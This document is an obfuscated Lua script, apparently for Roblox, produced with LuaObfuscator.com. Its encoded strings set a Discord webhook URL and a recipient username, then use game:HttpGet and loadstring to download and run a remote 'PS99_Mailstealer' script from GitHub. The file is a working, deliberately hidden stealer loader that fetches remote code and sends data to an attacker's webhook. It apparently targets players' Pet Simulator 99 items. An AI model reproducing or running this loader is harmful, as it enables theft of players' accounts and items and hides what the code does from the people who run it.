--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v103=v5(v85,v19);v19=nil;return v103;else return v85;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -3)^(v32-(569 -(367 + 201)))))%((1067 -(68 + 997))^(((v33-1) -(v32-(928 -(214 + 713)))) + ((1272 -(226 + 1044)) -1))) ;return v86-(v86%(1 -(0 -0))) ;else local v87=(879 -(282 + 595))^(v32-(2 -1)) ;return (((v31%(v87 + v87))>=v87) and (620 -(555 + 64))) or (931 -(857 + 74)) ;end end local function v21() local v34=0;local v35;while true do if (v34==(118 -(32 + 85))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + (120 -55))) ;v34=(1 -0) + 0 ;end end end local function v22() local v36=350 -(87 + 263) ;local v37;local v38;while true do if (v36==(180 -(67 + 113))) then v37,v38=v1(v16,v18,v18 + (954 -(802 + 150)) + 0 );v18=v18 + (4 -2) ;v36=1 + 0 ;end if (v36==(2 -1)) then return (v38 * (1017 -761)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + (11 -(15 -8)) ;return (v42 * ((21379272 -11605770) + 7003714)) + (v41 * (47703 + 17833)) + (v40 * (1443 -(1069 + 118))) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 + (0 -0) ,35 -15 ) * ((2 + 0)^(823 -(368 + 423)))) + v43 ;local v47=v20(v44,65 -44 ,110 -79 );local v48=((v20(v44,50 -(10 + 8) )==(3 -2)) and  -(443 -((1275 -(814 + 45)) + 26))) or 1 ;if (v47==(0 -(0 -0))) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else local v94=0;while true do if (v94==(438 -(145 + 293))) then v47=431 -(44 + 386) ;v45=1486 -(998 + 488) ;break;end end end elseif (v47==(651 + 1396)) then return ((v46==(0 + 0)) and (v48 * ((773 -(201 + 571))/(1138 -(116 + 1022))))) or (v48 * NaN) ;end return v8(v48,v47-(4258 -(175 + 3060)) ) * (v45 + (v46/(2^(31 + 21)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=886 -(261 + 624) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=2) then else v57=nil;v58=nil;v52=405 -(108 + 294) ;end if (v52~=1) then else local v91=0;while true do if (v91~=0) then else v55=nil;v56=nil;v91=1490 -(570 + 919) ;end if (v91~=1) then else v52=2 -0 ;break;end end end if (3==v52) then local v92=811 -(569 + 242) ;while true do if (v92==1) then v52=4;break;end if (v92==(0 -0)) then v59=nil;v60=nil;v92=1;end end end if ((1 + 3)==v52) then while true do if (v53==0) then local v99=1024 -(706 + 318) ;local v100;while true do if (v99~=0) then else v100=1251 -(721 + 530) ;while true do if (v100==1) then v53=1;break;end if (v100~=0) then else local v125=0;while true do if (v125~=(1271 -(945 + 326))) then else v54=0;v55=nil;v125=1;end if (v125~=(2 -1)) then else v100=1;break;end end end end break;end end end if (v53==3) then v60=nil;while true do local v104=0;local v105;while true do if (v104~=0) then else v105=0 + 0 ;while true do if (v105==(701 -(271 + 429))) then if ((1 + 0)~=v54) then else local v156=0;local v157;while true do if (v156~=0) then else v157=1500 -(1408 + 92) ;while true do if ((1087 -(461 + 625))~=v157) then else for v168=1,v59 do local v169=1288 -(993 + 295) ;local v170;local v171;local v172;local v173;while true do if (v169==(1 + 1)) then while true do if (v170~=(1171 -(418 + 753))) then else local v179=0;while true do if (0==v179) then v171=0 + 0 ;v172=nil;v179=1;end if (v179==(1 + 0)) then v170=1;break;end end end if (v170~=(1 + 0)) then else v173=nil;while true do if (v171~=0) then else local v181=0;while true do if (v181==0) then v172=v21();v173=nil;v181=1 + 0 ;end if (v181==(530 -(406 + 123))) then v171=1770 -(1749 + 20) ;break;end end end if (v171~=(1 + 0)) then else if (v172==1) then v173=v21()~=(1322 -(1249 + 73)) ;elseif (v172==(1 + 1)) then v173=v24();elseif (v172==3) then v173=v25();end v60[v168]=v173;break;end end break;end end break;end if ((1146 -(466 + 679))==v169) then v172=nil;v173=nil;v169=4 -2 ;end if (0==v169) then v170=0;v171=nil;v169=1;end end end v58[3]=v21();v157=2;end if (v157~=(5 -3)) then else v54=2;break;end if (v157~=(1900 -(106 + 1794))) then else local v166=0 + 0 ;local v167;while true do if ((0 + 0)~=v166) then else v167=0;while true do if (v167==1) then v157=1;break;end if (v167~=(0 -0)) then else local v178=0 -0 ;while true do if (v178==0) then v59=v23();v60={};v178=115 -(4 + 110) ;end if (v178~=(585 -(57 + 527))) then else v167=1428 -(41 + 1386) ;break;end end end end break;end end end end break;end end end break;end if ((103 -(17 + 86))==v105) then local v150=0 + 0 ;local v151;while true do if (v150~=0) then else v151=0 -0 ;while true do if (0==v151) then local v164=0 -0 ;while true do if (v164~=1) then else v151=167 -(122 + 44) ;break;end if (v164==0) then if (v54==(2 -0)) then local v174=0;local v175;while true do if (v174~=0) then else v175=0;while true do if (v175~=(0 -0)) then else for v183=1,v23() do local v184=0;local v185;local v186;while true do if (0==v184) then v185=0;v186=nil;v184=1;end if (v184~=(1 + 0)) then else while true do if (v185~=0) then else v186=v21();if (v20(v186,1,1 + 0 )~=0) then else local v189=0 -0 ;local v190;local v191;local v192;local v193;local v194;while true do if (v189~=2) then else v194=nil;while true do if ((65 -(30 + 35))==v190) then local v195=0 + 0 ;while true do if (1==v195) then v190=1258 -(1043 + 214) ;break;end if (v195==(0 -0)) then v191=0;v192=nil;v195=1;end end end if (v190~=(1214 -(323 + 889))) then else while true do if (v191==(5 -3)) then local v197=0;local v198;while true do if (v197~=(580 -(361 + 219))) then else v198=0;while true do if (v198~=0) then else if (v20(v193,1,1)~=1) then else v194[2]=v60[v194[2]];end if (v20(v193,322 -(53 + 267) ,1 + 1 )~=1) then else v194[3]=v60[v194[416 -(15 + 398) ]];end v198=1;end if (v198==(983 -(18 + 964))) then v191=11 -8 ;break;end end break;end end end if (v191~=(1 + 0)) then else v194={v22(),v22(),nil,nil};if (v192==(126 -(116 + 10))) then local v201=0 + 0 ;local v202;local v203;while true do if (v201~=(738 -(542 + 196))) then else v202=0 -0 ;v203=nil;v201=1;end if (v201~=(1 + 0)) then else while true do if (v202==(0 + 0)) then v203=0 + 0 ;while true do if (0~=v203) then else v194[7 -4 ]=v22();v194[9 -5 ]=v22();break;end end break;end end break;end end elseif (v192==(1552 -(1126 + 425))) then v194[3]=v23();elseif (v192==(407 -(118 + 287))) then v194[3]=v23() -((7 -5)^16) ;elseif (v192==(1124 -(118 + 1003))) then local v212=0 -0 ;local v213;while true do if (v212==0) then v213=377 -(142 + 235) ;while true do if (v213==0) then v194[3]=v23() -((9 -7)^(4 + 12)) ;v194[981 -(553 + 424) ]=v22();break;end end break;end end end v191=2;end if (v191==(0 -0)) then local v199=0;while true do if (v199~=1) then else v191=1;break;end if (v199~=(0 + 0)) then else v192=v20(v186,2 + 0 ,3);v193=v20(v186,3 + 1 ,6);v199=1;end end end if (v191~=(2 + 1)) then else if (v20(v193,3,3)==1) then v194[3 + 1 ]=v60[v194[8 -4 ]];end v55[v183]=v194;break;end end break;end if ((2 -1)~=v190) then else local v196=0 -0 ;while true do if (v196~=(1 + 0)) then else v190=2;break;end if (0~=v196) then else v193=nil;v194=nil;v196=1;end end end end break;end if ((0 -0)==v189) then v190=0;v191=nil;v189=1;end if (v189==1) then v192=nil;v193=nil;v189=2;end end end break;end end break;end end end for v187=754 -(239 + 514) ,v23() do v56[v187-(1 + 0) ]=v28();end v175=1330 -(797 + 532) ;end if ((1 + 0)~=v175) then else return v58;end end break;end end end if (v54==(0 + 0)) then local v176=0 -0 ;local v177;while true do if (v176==(1202 -(373 + 829))) then v177=731 -(476 + 255) ;while true do if (v177==(1132 -(369 + 761))) then v54=1 + 0 ;break;end if (v177==(1 -0)) then local v180=0 -0 ;while true do if (v180==1) then v177=240 -(64 + 174) ;break;end if (v180~=0) then else v57={};v58={v55,v56,nil,v57};v180=217 -(42 + 174) ;end end end if (v177~=0) then else v55={};v56={};v177=1;end end break;end end end v164=1 + 0 ;end end end if (v151~=(1 + 0)) then else v105=1;break;end end break;end end end end break;end end end break;end if (v53==(1 + 1)) then local v101=1504 -(363 + 1141) ;while true do if (v101~=0) then else v58=nil;v59=nil;v101=1;end if (v101==(1581 -(1183 + 397))) then v53=8 -5 ;break;end end end if (v53==(1 + 0)) then local v102=0;while true do if ((0 + 0)==v102) then local v106=1975 -(1913 + 62) ;while true do if (0~=v106) then else v56=nil;v57=nil;v106=1;end if (v106~=1) then else v102=1;break;end end end if (v102~=1) then else v53=2;break;end end end end break;end if (v52~=0) then else local v93=0;while true do if (v93~=1) then else v52=1 + 0 ;break;end if (v93~=(0 -0)) then else v53=1933 -(565 + 1368) ;v54=nil;v93=3 -2 ;end end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v81[3];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=2) then v79[v81[2]]();elseif (v82>3) then local v126=0;local v127;while true do if (v126==0) then v127=v81[2];v79[v127]=v79[v127](v13(v79,v127 + 1 ,v74));break;end end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=7) then if (v82<=5) then v73=v81[3];elseif (v82==6) then do return;end else v79[v81[2]]();end elseif (v82<=8) then local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==1) then v74=(v115 + v113) -1 ;v116=0;v112=2;end if (0==v112) then v113=v81[2];v114,v115=v72(v79[v113](v13(v79,v113 + 1 ,v81[3])));v112=1;end if (v112==2) then for v153=v113,v74 do v116=v116 + 1 ;v79[v153]=v114[v116];end break;end end elseif (v82==9) then local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==1) then v74=(v132 + v130) -1 ;v133=0;v129=2;end if (v129==0) then v130=v81[2];v131,v132=v72(v79[v130](v13(v79,v130 + 1 ,v81[3])));v129=1;end if (v129==2) then for v161=v130,v74 do v133=v133 + 1 ;v79[v161]=v131[v133];end break;end end else local v134=v81[2];v79[v134]=v79[v134](v13(v79,v134 + 1 ,v74));end elseif (v82<=15) then if (v82<=12) then if (v82==11) then v73=v81[3];elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=13) then v63[v81[3]]=v79[v81[2]];elseif (v82==14) then do return;end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=18) then if (v82<=16) then local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];elseif (v82==17) then v63[v81[3]]=v79[v81[2]];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=19) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>20) then local v143=v81[2];local v144=v79[v81[3]];v79[v143 + 1 ]=v144;v79[v143]=v144[v81[4]];else v79[v81[2]]=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313233343035323933313933353031302O38372F6F4F36526A327730466E44384F47506D6276635976454E65454F33677A59343039417A49505A3532676F6E6B4947722O3135646935654B7036394B32594449387056486D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083O00557365726E616D6503073O004F6B6E6F626F62030A3O004C6F61645363722O656E00163O0012143O00013O00260C3O000D0001000200040B3O000D0001001214000100043O00120D000100033O001201000100053O001201000200063O002010000200020007001214000400084O0008000200044O000400013O00022O000700010001000100040B3O0015000100260C3O00010001000100040B3O000100010012140001000A3O00120D000100094O000F000100013O00120D0001000B3O0012143O00023O00040B3O000100012O00063O00017O00",v9(),...);